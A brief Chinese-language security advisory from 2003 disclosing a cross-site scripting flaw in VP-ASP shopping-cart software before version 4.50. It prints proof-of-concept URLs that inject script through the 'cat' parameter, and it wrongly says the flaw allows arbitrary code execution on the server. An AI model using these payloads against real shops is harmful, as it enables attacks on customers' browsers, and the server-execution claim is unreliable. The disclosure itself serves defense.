发布日期:2003-12-9

涉及程序：
vp-asp 4.50版之前的版本

描述：
vp-asp存在跨站脚本执行缺陷

详细：
Virtual Programming VP-ASP是一款著名的用ASP编写，用于商务网站的网上购物程序，支持Access, MSSQL, MySQL on Windows和MySQL on UNIX多种数据库。

vp-asp程序中由于对接收的URL请求缺乏充分的过滤，攻击者通过向目标服务器提交精心构造的包含恶意代码的下列格式URL能触发跨站脚本执行缺陷，允许攻击者在目标服务器上执行任意代码：
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>

攻击方法：
示例代码：
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>